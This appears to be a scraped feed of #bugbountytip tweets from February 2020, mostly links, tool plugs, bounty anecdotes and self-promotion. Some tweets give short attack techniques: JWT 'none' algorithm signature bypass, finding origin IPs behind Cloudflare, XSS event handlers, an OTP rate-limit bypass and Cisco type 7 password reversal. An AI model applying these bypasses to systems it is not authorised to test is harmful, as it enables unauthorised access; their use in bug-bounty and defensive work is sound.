2020-02-19 18:32:10
0 Researchers have tricked Tesla vehicles into accelerating from 35 mph to 85 mph using duck tape. The researchers modified the shape of a 3 to look like an 8 on multiple street signs. #Tesla #Bugbountytip
Manyasa Oliver
@M_Oliver_Watiti


2020-02-19 18:26:12
0 Anyone Who Has come accross .htmopt extention anywhere? #Bugbountytip #bugbounty
Pranav Hivarekar
@HivarekarPranav


2020-02-19 17:00:01
6 Mastering the Skills of Bug Bounty by @vickieli7 via @thestartup_ https://t.co/LZGj7GQW5n #bugbounty #bugbountytip
z3rb0a
@OwlCyberGhost1


2020-02-19 16:02:41
0 #bugbountytip #bugbounty Weird Bug. Changing my username to number 10 or 12 or ...10000 will disclose other user Information ( Including Access token & Session token ) Lol xD
Shubham Sharma
@Shubham_pen


2020-02-19 14:32:44
0 Meterpreter, a highly developed payload that can be extended dynamically, is known to be Hacker’s Swiss Army Knife. @rajchandel @kalilinux #cybersecurity #infosec #pentest #oscp #meterpreter #Bugbountytip #Hackers #WednesdayWisdom https://t.co/PbDAnudJFL
Nameless
@3301o


2020-02-19 13:23:28
0 When use WayBackUrls by @TomNomNom, use below Regex to find parameterized URL(s): \/[A-Za-z0-9_.-]*[a-z]*\?.*= #bugbountytips #Bugbountytip #BugBounty
Cyber Security Bot
@CyberSecCare


2020-02-19 09:47:15
3 Follow to get all Security/Cyber Security related tweets. A bot made by @S0fianeHamlaoui which looks for and retweets tweets cotaining the the below twitter tags : #cybersecurity #pentesting #security #infosec #linux #Bugbountytip #bugbountytips #malware #hacking
CyberTaters
@CyberTaters


2020-02-19 08:58:16
2 Follow to get all Security/Potato Security related tweets. A bot made by @S0fianeHamlaoui which looks for and retweets tweets cotaining the the below twitter tags : #potatosecurity #pentesting #security #infosec #linux #Bugbountytip #bugbountytips #malware #mashing
Cyber Security Bot
@CySecuritybot


2020-02-19 08:58:11
2 Follow to get all Security/Cyber Security related tweets. A bot made by @S0fianeHamlaoui which looks for and retweets tweets cotaining the the below twitter tags : #cybersecurity #pentesting #security #infosec #linux #Bugbountytip #bugbountytips #malware #hacking
Manoj Khadka
@Manojkhd


2020-02-19 08:39:52
0 Websites vulnerability and Bug reporting @Administor #Bugbountytip #bughunter #vulnerable #webserver #xss #crsf https://t.co/Go7DFoSqBR
HackIsOn ®
@hackison


2020-02-19 08:17:49
2 #Bugbountytip If you want to bypass cloudflare protection and find the target’s origin ip. Use : https://t.co/TGirjy7p2g to find targets domain’s DNS history. C2C 🤗 #bugbounty #bugbountytip #bugbountytips #hackison #hacking #vapt #wapt #pentesting #redteaming #redteam
Oghenejivwe 🇳🇬🗯
@realOghenejivwe


2020-02-19 06:20:25
0 I need to find my first bug. Not even because of the money. For my mental health. #BugBounty #Bugbountytip
Pratik Yadav
@PratikY9967


2020-02-19 05:29:18
0 Sometimes .gitignore file can help you to get database credentials as well try to visit all endpoints showed up by gitignore on all subdomains :)😂😂 #bugbountytip #bugbounty #infosec https://t.co/qAjnmRXLgs https://t.co/lGKsuT7C5x
Joseph Melika
@jmelika


2020-02-19 04:16:30
0 #bugbountytip When you see SSO with JWT, intercept, decode, change the alg to either none or HS232 to bypass signature and send the new encoded JWT instead. If it goes through, you hit the jackpot. #SecureTheInternet #CESPPA #bugbounty #bugbountytips
Hx01
@Hxzeroone


2020-02-18 16:31:35
2 #Bugbountytip If you want to bypass cloudflare protection and find the target’s origin ip. Use : https://t.co/NU3CNcekJi to find targets domain’s DNS history. https://t.co/yz1Z2jGKvN
ALL ABOUT HACKER
@AboutHacking


2020-02-18 16:24:43
0 How to start Bug Bounty Hunting Read: https://t.co/9DAu77YcZ8 #CyberSecurity #bugbounty #bugbountytips #bugbountytip
Pranav Hivarekar
@HivarekarPranav


2020-02-18 15:30:00
8 WebSockets Security Testing: - https://t.co/yjUbgZJeZY - https://t.co/Gf6dofbt7J - https://t.co/ykbQAv6b8G Tools: - https://t.co/tw3icPAFZS - Burp - https://t.co/UpH9TM3TWK Case studies: - https://t.co/AaY9a6GFQ1 - https://t.co/0D1c9c8bhW #bugbounty #bugbountytip #infosec
Shubham Sharma
@Shubham_pen


2020-02-18 15:18:58
1 Today you will learn how to escalate the root shell if docker is running on the hots machine or I should say @Docker privilege escalation to spawn root shell. @rajchandel @ubuntu #cybersecurity #pentest #ITSecurity #bugbountytip #infosec #tuesdayMotivation https://t.co/4vYoWaz2fY
Brett Russell
@brettarussell


2020-02-18 15:06:45
0 You're smart when you can set your own Bug Bounty. Unfortunately they chose to reward themselves handsomely. #bugbountytip https://t.co/7V1A8iZd30
Brett Russell
@brettarussell


2020-02-18 15:04:05
0 @crypto_bobby You're smart when you can set your own Bug Bounty. Unfortunately they chose to reward themselves handsomely. #bugbountytip
Seasoned Cyber Security Professionals
@scspcommunity


2020-02-18 14:45:36
2 Bug Bounty Tips part 3 #bugbountytip #bugbountytips #bugbounty #bughunting #bughunter #hackerone #bugcrowd #hacker #ethicalhacking #hacking #Pentesting #webapp #webappsec #appsec #applicationsecurity #infosec #cybersec #cybersecurity #informationsecurity https://t.co/YMP5pCY7yE
Anas Mahmood 🇵🇰
@AnasIsHere


2020-02-18 14:06:11
3 Also, You can check the domain, if it have any private program on Bugcrowd by looking it's TXT record with dig dig TXT domain.tld | grep bugcrowd #BugBounty #BugBountyTip #OutHackThemAll https://t.co/WCbwg4ZNxo
Jake Miller
@theBumbleSec


2020-02-18 13:01:10
15 I am excited to release my new tool GadgetProbe: Inspect endpoints consuming Java serialized objects to identify classes, libraries, and library versions on remote classpaths. No more sitting in the dark if ysoserial doesn't fire. https://t.co/lJfeIMMzeU #bugbounty #bugbountytip
Anas Mahmood 🇵🇰
@AnasIsHere


2020-02-18 12:10:07
1 Hey Bug Bounty Folks, Want more private programs on Bugcrowd? Just visit this https://t.co/iqgKAiy5Xr Also, dig TXT domain.tld | grep bugcrowd #BugBountyTip 🤙
Nouroz Gaming
@NourozGaming


2020-02-18 08:05:58
0 New write-up for beginners like me. #hackwithcommunity #bugbountytips #bugbountytip #infosec https://t.co/rtAQmQFkUU
Khaled Mohamed
@0xElkomy


2020-02-17 21:03:25
0 OneLogin authentication bypass on WordPress sites https://t.co/6NcFwEg5lk #bugbountytips #bugbounty #bugbountytip
CyberTheReapeR☢
@CyberTheReapeR5


2020-02-17 19:07:41
0 Yay, i earned 300$ I did not win this award on any bug bounty platform #hackerone #bugcrowd #infosec #bugbountytip
m0z
@LooseSecurity


2020-02-17 18:51:32
1 Three really good event handlers for XSS would be: onfocus onsearch And also using accesskeys, which is usually low severity but a really easy way to get XSS as it bypasses most security measures. #bugbountytips #bugbountytip #bugbounties #infosec #infosecurity #coronavirus
Your Next Bug Tip
@YourNextBugTip


2020-02-17 17:18:32
5 XSSI and JSONP found by Omkar Bhagwat @th3_hidd3n_mist Important notes and #bugbountytips at the end of the WriteuP Vul Worth $$800$$ If you are new to XSSi and JSONP then MUST READ the WriteuP #bugbountytip #bugbounty https://t.co/vOguXKK8Te
ｙｏｄｈｈａ
@y0dhha


2020-02-17 16:11:46
1 1) Data Processing (IBB) disclosed a bug submitted by geeknik https://t.co/yqNZldQJ1p 2) [API] ICQ user's avatar can be manipulated remotely https://t.co/O31iYklXPk #bugbountytips #bugbounty #bugbountytip
ｙｏｄｈｈａ
@y0dhha


2020-02-17 16:11:14
2 1) CORS misconfiguration which leads to the disclosure of certain data concerning the user. https://t.co/AfzrUS0BAh 2) JAVASCRIPT INJECTION IN SIX ANDROID MAIL CLIENTS https://t.co/RAo0IlmgEV #bugbountytips #bugbounty #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-17 09:24:29
2 Cisco Type 7 Reverser Paste any Cisco IOS "type 7" password string into the form below to retrieve the plaintext value. Follow Hackdoor - https://t.co/iNczOcGmCt https://t.co/uTzPKkBn6S #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-17 09:19:05
3 CEHv9-Notes - If you want to be professional Penetration Tester and Bug Bounty Expert - Follow Hackdoor : Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #cybersecurity https://t.co/LIlYcZOBk7
Ammar Amer🇸🇾
@cry__pto


2020-02-16 21:59:57
0 CTF Challenges Archives: https://t.co/xFeGOlUGhs #bugbountytip #hacking #pentest #redteam
Ammar Amer🇸🇾
@cry__pto


2020-02-16 21:53:51
1 Find Secret API-Keys: https://t.co/6BZkftxJnJ #bugbountytip #hacking
Andrew Roe
@aroe1994


2020-02-16 21:04:18
0 We are LIVE with #HackTheBox! https://t.co/a2ASaTS2z3 #cybersecurity #bugbountytip
CyberTheReapeR☢
@CyberTheReapeR5


2020-02-16 17:28:08
0 İ earned 2.000$ (I did not win this award on any bug bounty platform) Bugs: 2 subdomain takeover 2 xss (self and reflected) 1 sql injection 1 SQL database username and password information. Total: 2.000$ #hackerone #bugcrowd #infosec #bugbountytip
ghostlulz
@ghostlulz1337


2020-02-16 16:55:45
0 Bug Bounty Slack Group over 1,500 hackers. If you're looking for a space where you can chat, learn, share knowledge, and meet like minded people you should check out my slack channel. https://t.co/lwmVfsjSPm #bugbounty #bugbountytips #bugbountytip #infosec #redteam #security https://t.co/RBR2vQBlFN
Pranav Hivarekar
@HivarekarPranav


2020-02-16 14:04:43
12 SAML Security Testing Tutorial: 1 - https://t.co/imIWYX6AdF 2 - https://t.co/Gz9Vg2DeoX 3 - https://t.co/RVX6m56n0W Attack Surface: https://t.co/DIsjXQYJ06 Examples of bugs: - https://t.co/D6aHlzTxlA - https://t.co/YFy5SHYHL4 - https://t.co/e74Msi6a3k #bugbounty #bugbountytip
Shubham Patel
@Shubham_4500


2020-02-16 07:51:52
0 #bugbountytip #bugbountytips Report First and then in free time do the additional exploit , got duplicate with the difference of 4 reports, its part of bugbounty life :) lesson learned with heart full of guilt. #hackerone #bugbountylife #bugcrowd https://t.co/g0aBsB8I2G
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-16 07:25:48
7 Which one do you prefer ? #GOOGLE v/s #DUCKDUCKGO Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/9YlR6DAjcZ
ghostlulz
@ghostlulz1337


2020-02-16 03:20:13
10 You know Django, Flask and many other python web libraries are vulnerable to RCE when you enable debug mode. Most people don't know this is possible. More info on my blog: https://t.co/rpPIaQpDaL #bugbounty #bugbountytips #bugbountytip #redteam #infosec #flask #django #python https://t.co/JrUzyoI10q
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-16 02:46:26
0 #unc0ver v4.0.0 is NOW OUT - Now with full-fledged support for A12-A13 devices on iOS 13.0-13.3 with Cydia and system-wide tweak injection! Get it at: https://t.co/Wfzq4z4aQU Follow Us 💰💰 https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-15 17:59:50
1 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/jDvHB5ty2z
Edwin Digital #digitalke #edmuke
@digitalked


2020-02-15 17:23:31
1 Do you like the wayback machine? Do you like sqli injection? What happens when you combine them both, you get a unique sqli scanner. Check out my blog for more info: https://t.co/a80MXOn1er #BugBounty #bugbountytips #bugbountytip #osint #hacking #dfir #infosec #sqli
Abdullah Fares Muhanna
@amad3u6


2020-02-15 16:48:11
1 @Burp_Suite To avoid @zaproxy crashes when you have Large Response, try to install oracle JDK instead of OpenJDK #bugbountytips #bugbountytip #bugbounty #infosec
Abdullah Fares Muhanna
@amad3u6


2020-02-15 16:43:25
1 You can specify memory size for @Burp_Suite to make it more smoother by using -Xmx (3GB example): ~$ java -jar -Xmx3072M /path/to/burpsuite.jar or ~$ java -jar -Xmx3G /path/to/burpsuite.jar #bugbountytips #bugbountytip #bugbounty #infosec
ghostlulz
@ghostlulz1337


2020-02-15 15:53:12
2 If you're looking to make a 🤑living🤑 doing Bug Bounties or Pentesting you may want to get a copy of my book. Easy wins all day💰. https://t.co/zJFRZjg5q2 #bugbounty #bugbountytips #bugbountytip #redteam #pentest #infosec #appsec #cybersecurity #xss #hacker #cyber #security https://t.co/rSdiFyIR9U
Nikhil Mahajan
@mahajan344


2020-02-15 15:02:38
0 want to do a static and dynamic analysis of android apps on the fly / on the web. use @apklabio They provide very good static /dynamic /network analysis of apk files. #AndroidSecurity #bugbountytip #bugbounty #AndroidHackingMonth on @Hacker0x01 https://t.co/cNXt1gKLvg
Str0k1rch🏴‍☠️
@str0k1rch


2020-02-15 13:01:24
1 Make sure to update fellow hacker ;) #bugbountytip https://t.co/SzEKGgxNaX
Khaled Mohamed
@0xElkomy


2020-02-15 11:03:07
0 Osmedeus allows you to automatically run a collection of awesome tools for reconnaissance and vulnerability scanning against the target. https://t.co/Yhzwb92gOV #bugbountytips #bugbounty #infosec #bugbountytip
Pranav Hivarekar
@HivarekarPranav


2020-02-15 08:48:57
7 Shodan Pentesting Guide https://t.co/ef11lug0EW #bugbounty #bugbountytip
Hridoy Ahmed
@hridoysec


2020-02-15 05:43:41
0 #bugbountytip from @TH3G3NT https://t.co/jRtpMU2f1F
Your Next Bug Tip
@YourNextBugTip


2020-02-15 04:39:55
0 Must Read #bugbountytip https://t.co/haPpJR89XF
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-14 19:14:04
1 #BugBountyTip : Be creative with wordlists. #Seclists is great but every bug hunter uses it. If you are looking for non-#duplicates use #CRUNCH to generate your own wordlists specific to your web app / api platform ! Follow #Hackdoor - https://t.co/iNczOcGmCt #bugbountytips
Steve Mcilwain
@steve_mcilwain


2020-02-14 16:48:01
0 Automate your recon screenshots via command line or script with Eyewitness. Can take a file of URLs as input. https://t.co/Tc6yWK3ulG #pentest #pentesting #bugbountytip #bugbountytips #hacking
Your Next Bug Tip
@YourNextBugTip


2020-02-14 16:42:46
2 Unique way of Account Takeover @0xAkash figure out how to create password reset token!! Must Read (2 min read) https://t.co/Xfax4i7lSN #bugbounty #bugbountytips #bugbountytip
Imran Parray
@CreedHackers


2020-02-14 16:40:52
1 #BugBountyTip You will always Find what you are looking for. So if you haven't found a RCE,SSRF or any other critical ones yet. Probably you aren't looking for them.
Your Next Bug Tip
@YourNextBugTip


2020-02-14 14:11:24
0 What are some good Hacker's Groups? On #Discord #Slack #anyPlatform #bugbounty #bugbountytips #bugbountytip
Ammar Amer🇸🇾
@cry__pto


2020-02-14 13:12:35
11 use-firefox-browser-as-a-penetration-testing-tool-with-these-add-ons: https://t.co/lBtuovYuWB 19-extensions-to-turn-google-chrome-into-penetration-testing-tool: https://t.co/f2rcEFu7LX #bugbountytip #hacking #pentest #BugBounty
Kartik Charande
@kartikraj909


2020-02-14 09:49:51
0 Amazing write up quick explanation #bugbountytip #infosec https://t.co/ezJBqzZdrw
Ammar Amer🇸🇾
@cry__pto


2020-02-14 06:01:12
3 SimplyEmail: -setup: curl -s https://t.co/MO25nwVDJD -usage: ./SimplyEmail -all -v -e https://t.co/KdHhpMULry results: firefox https://t.co/KdHhpMULry<date_time>/Email_List.html -1-email address format of the target -2-list of valid users #OSINT #pentest #bugbountytip #hacking
Mourad
@SecuAudit


2020-02-13 22:31:42
0 @Godaddy Bug Bounty is a scam , i got a lot of testimonials of security researchers scammed by them #bugbounty #bugbountytip #bugbountytips #infosec #Hacker0x01 @GoDaddyCanada @GoDaddyHelp https://t.co/GcoryY6rbf
Mast3rM1nd
@lollysofsof


2020-02-13 22:25:54
2 let's educate each others :) #infosec #pentesting #bugbounty #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-13 19:45:34
0 From checkra1n to Frida: iOS App Pentesting Quickstart on iOS 13 Follow #Hackdoor Facebook https://t.co/iNczOcGmCt Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training https://t.co/mHCTPO2kMP
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-13 18:06:51
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/Nm2ZSJHS74
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-13 18:06:16
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/spJfF1f6qy
Ganesh Bagaria
@Ganofins


2020-02-13 14:24:50
0 I just finished Access Control materials and labs on @WebSecAcademy Any suggestion for other labs or exercises or live sites based on access control vulnerabilities? #accesscontrol #idor #portswigger #bugbountytip
INTIGRITI
@intigriti


2020-02-13 14:05:21
18 ⚠️ Are you signing your JWT tokens? Good...unless hackers can change the signing algorithm to 𝘯𝘰𝘯𝘦. Make sure to check this, or @yassineaboukir will do it for you and claim yet another #BugBounty! 😂 #BugBountyTip #HackWithIntigriti https://t.co/1sW1B766Qi
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-02-13 12:39:55
1 New write-up for beginners like me. #hackwithcommunity #bugbountytips #bugbountytip #infosec https://t.co/DaPtYGY7pB
Seasoned Cyber Security Professionals
@scspcommunity


2020-02-13 09:10:16
7 #bugbounty tips part 2 #hacking #ethicalhacking #bugbounty #bugbountytip #securitytesting #webapp #pentesting #webapptesting #webappsecurity #appsec #hackerone #bugcrowd #bounty #infosec #cybersec #cybersecurity #informationsecurity #hacker #bughunting #bugbountytips https://t.co/4pcPahsC8Z
Your Next Bug Tip
@YourNextBugTip


2020-02-13 08:38:07
1 Reflected XSS on 8x8 Found In 3 minutes by @gkhck_ Recently I have seen lots of people using ARJUN to find hidden parameters. Great Tool by @s0md3v Must Read WriteUp Here(1min read) #bugbounty #bugbountytips #bugbountytip https://t.co/Ga3x3fxeiO
HackDoor
@hackd00r


2020-02-13 04:03:45
0 Resources-for-Beginner-Bug-Bounty-Hunters https://t.co/IWvPfE8LgK Follow #Hackdoor - Facebook - https://t.co/lb0uyl3k4p LinkedIn - https://t.co/Chd0Qii4TT Instagram - https://t.co/1YqKY0ZFK1 Youtube - https://t.co/ovEGR1Is7q #BugBounty #BugBountyTip #pentesting #devsecops
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-13 04:01:14
0 Resources-for-Beginner-Bug-Bounty-Hunters Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining https://t.co/ZHnkjd1adq
Ammar Amer🇸🇾
@cry__pto


2020-02-13 00:55:20
1 Google Dorking: https://t.co/AoJ94PbopC #OSINT #bugbountytip #Hacking
jdksec
@jdksec


2020-02-13 00:30:14
2 So lost in tmux nested sessions....... 😂 #bugbounty #bugbountytip #hackerone #bugcrowd #allthegearnoidea https://t.co/EeS49RPLEY
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-02-12 21:27:08
1 My first BB Write Up : How I paid 2$ for a +1000$ XSS https://t.co/QYXjW7O3xv #BugBounty #bugbountytips #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-12 18:00:14
3 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/3zAyRpdIfd
Evan Custodio
@defparam


2020-02-12 16:56:09
0 If y'all haven't heard about cloud-init, check it out https://t.co/y4S8Gdwqro #bugbountytips #bugbountytip https://t.co/cADixG2ti4
Cryptographer
@crypt0gr4ph3r


2020-02-12 15:51:15
0 Awarded $1,000 bounty of out of scope but very sensitive info disclose. Thanks @NahamSec for this #bugbountytip #bugbounty #hackerone https://t.co/eMGfDHxeGl
siLLyDaDDy
@sillydadddy


2020-02-12 14:02:31
0 #bugbounty #bugbountytip Just finished reading the book "web application hackers handbook ". Still very relevant .Awesome book.Highly recommended for new bug bounty hunters ... I will go back to it again later !!!! Thanks @DafyddStuttard and @MDSecLabs for your hard work !!!
o k t a v a n d i
@0ktavandi


2020-02-12 13:46:03
0 any tips to create 'null' origin? #bugbountytips #bugbountytip
Evan Custodio
@defparam


2020-02-12 13:39:42
1 I know some of you are doing this but, wanna increase your recon game? Create an automation framework on your VPS provider. I went from manual scans to 5-10 droplet workers auto scanning my targets. My recon data to analyze increased 10x. #bugbountytip (insert draw the owl meme)
Darkside
@darksh1d3


2020-02-12 12:07:24
1 Good references for bounty hunters #OffSec Advanced Web Attacks and Exploitation Resources https://t.co/blPPs3GtWS … #OSWE #bugbountytips #bugbountytip https://t.co/b7dMpByfTW
Ammar Amer🇸🇾
@cry__pto


2020-02-12 07:50:06
1 you can visit this website if you want To see a list of websites that have been hacked before: https://t.co/TMHG53oRIW a very useful free service that offers various DNS,networking,and e-mail analysis tools: https://t.co/7eVKGC0pjK #bugbountytip #hacking #pentest #redteam #OSINT https://t.co/Q1lc0ECSNs
Ammar Amer🇸🇾
@cry__pto


2020-02-12 07:48:02
3 Reverse Image Search: https://t.co/v4L4gqyvJY Google custom search engine: 300+ Social Networking Sites: https://t.co/WbGXl5hOUb street webcams: https://t.co/rxcrybQxsW #bugbountytip #hacking #pentest #redteam #OSINT https://t.co/osHNr287ql
Ammar Amer🇸🇾
@cry__pto


2020-02-12 07:41:59
4 This is the world biggest directory of online surveillance security cameras: https://t.co/IubMc5i95o Simple Twitter Profile Analyzer,Tweets metadata scraper & activity analyzer: https://t.co/M6v3uQ9lll -LinkedIn Contact Extractor: https://t.co/Yh4129EoDE #bugbountytip #OSINT
HackDoor
@hackd00r


2020-02-12 06:07:19
3 AWS Solutions Architect Certification - 2020 AWS IAM Tutorial https://t.co/9GjGq8WS9o #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
GokhanGK
@gkhck_


2020-02-12 05:05:46
7 New write-up for beginners like me. #hackwithcommunity #bugbountytips #bugbountytip #infosec https://t.co/DZ9AyAymfC
Ammar Amer🇸🇾
@cry__pto


2020-02-12 01:28:20
4 I enjoyed reading these books! #bugbountytip #hacking #pentest #bash #Linux https://t.co/pfIXoXwn20
Andrew Roe
@aroe1994


2020-02-12 01:27:45
0 Stream is live with some HackTheBox! Day 1 on my quest to master bug bounties. https://t.co/a2ASaTS2z3 #CyberSec #bugbountytip
The Notorious B.E.E. 🐝
@securibee


2020-02-11 19:09:26
4 Earlier today on @NahamSec Twitch stream someone asked if bug bounty is largely luck based. I replied with the following quote "Absolute Success is Luck. Relative Success is Hard Work." You can read more about it here https://t.co/KhoKqRXqjE #bugbounty #bugbountytip
baluz🔥
@0xbalooz


2020-02-11 18:18:25
0 @OffensiveHunter @santi_lopezz99 will this tweet will be in next @intigriti and @PentesterLand blog as a #bugbountytip
Patrik Fehrenbach🤖
@ITSecurityguard


2020-02-11 18:03:27
34 dear Bug Bounty world: DON'T spend money on ANY paid courses/mentors you'll find online, the information shared there is already public. Learn how to use Google and most importantly learn how to apply your knowledge. THERE ARE NO SECRETS FOR SALE 👈 #bugbounty #bugbountytip
Beatrix_Kiddo
@ki_twyce_


2020-02-11 17:34:54
0 My homeboy @aptSemi taught me about virtual workstations with VMware. It gave me the ability to get some experience in a linux environment. He also taught me about SQL injection and a few other things, and no I haven't done it yet 👀😂 but I'm grateful for the #bugbountytip https://t.co/B76nNVp2hf
Your Next Bug Tip
@YourNextBugTip


2020-02-11 16:24:50
0 @santi_lopezz99 So thats why instead of naming the title you just sold @OffensiveHunter's content, Great Tip #bugbountytips #bugbountytip #bugbounty
but most of all, samy is my hero
@SecGus


2020-02-11 15:24:42
1 #bugbountytip If you find an Open Redirect, check for Reflected / DOM based XSS, sometimes it is just a case of local JS updating the DOM to redirect to whatever parameter you included, and other times the parameters contents is directly inserted into window.location.href.
Arif Khan
@payloadartist


2020-02-11 14:57:00
1 Amazing handy cheatsheets for mobile #security testing! #bugbounty #bugbountytip https://t.co/va8IVbdNjC
bughuntercat
@bughuntercat


2020-02-11 14:17:42
0 #bugbountytip Don't be gossip or envious of who knows or has more than you. Better strive to learn for yourself and don't try to steal someone else's effort as if you were a vulture.
Dominik Małowiecki
@5up3rD43m0n


2020-02-11 12:23:35
0 Dear hackers when testing for XSS and trying to include remote js file, please don't forget to upgrade your SSL certificate. #LoL #bugbountytip https://t.co/voWmkahw4x
HackDoor
@hackd00r


2020-02-11 11:25:43
1 Bug Bounty Tutorial - Maximise Your Bug Bounty Output With Simple Nmap Script https://t.co/tRFLvb0ep1 #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-11 11:25:23
1 Bug Bounty Tutorial - Maximise Your Bug Bounty Output With Simple Nmap Script https://t.co/0gfcgW7uTM #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
Pranav Hivarekar
@HivarekarPranav


2020-02-11 05:56:18
1 Blind XSS write ups: 1] https://t.co/eWtYmGPgaL 2] https://t.co/yNGKoJnlZY 3] https://t.co/WLZhTHgBYt #bugbounty #bugbountytip
Hussein Daher
@HusseiN98D


2020-02-10 21:39:29
1 The best #bugbountytip I can give is not to diversify much with tools that do the same work. Test all tools which are for one task and keep the best. You'll gain more in speed and less headache
healthyoutlet
@healthyoutlet


2020-02-10 20:19:38
1 want to know if a hash that was recently generated is actually a timestamp? for i in $(seq $($(echo date +%s)-1000|bc) $($(echo date +%s)+1000|bc)); do echo $i | sha256sum; done | grep YOURHASH #bugbountytip
Doug Little Jr
@douglittlejr


2020-02-10 19:36:00
0 @LindseyGrahamSC @JudgeJeanine @seanhannity @LindseyGrahamSC, been doing #Cybersecurity bout as long as you've been doing legislating. What you did to be doing what you are doing now? Younger days possessed less self control, would be deep diving every #bigdata known 2 know. Heads up, @GOP a #bugbountytip buyer & seller https://t.co/xdb5QaRPcd
Udit Bhadauria
@udit_thakkur


2020-02-10 14:41:12
0 Weird rate_limit bypass: #bugbountytip #bypass #infosec Reported rate limit on OTP sms. Company fixed the issue. To bypass: Capture the request. Remove the country code +91 to [ ] Modify the number from xxxxx-xxxxx to +91 xxxxx-xxxxx Bypass successful. 😂😂
siLLyDaDDy
@sillydadddy


2020-02-10 13:24:35
0 How long it did take for you to get your first triage , after you started bug bounty hunting ? .please RT. #bugbounty #bugbountytip
Your Next Bug Tip
@YourNextBugTip


2020-02-10 11:02:48
0 Is there any platform that provide CTFs for latest CVEs, so we can learn from them? Do @PentesterLab @hackthebox_eu have something like that? #bugbounty #bugbountytips #bugbountytip
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2020-02-10 09:15:01
0 #bugbountytip #nmap Extract subdomains from IP range. nmap IP_range | grep "domain" | awk '{print $5}' Example for bitdefender https://t.co/5IY0ieaOWZ
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-10 08:35:46
0 Cross Site Scripting Basics - OWASP Juice Shop Tutorial OWASP Top Ten https://t.co/0wdvBhdOHw #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining #devsecops #cybersecurity #training #ceh #eccouncil #certification #hackerone
HackDoor
@hackd00r


2020-02-10 08:35:08
0 Cross Site Scripting Basics - OWASP Juice Shop Tutorial OWASP Top Ten https://t.co/EBV0NpKxBQ #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining #devsecops #cybersecurity #training #ceh #eccouncil #certification #hackerone
HackDoor
@hackd00r


2020-02-10 08:33:11
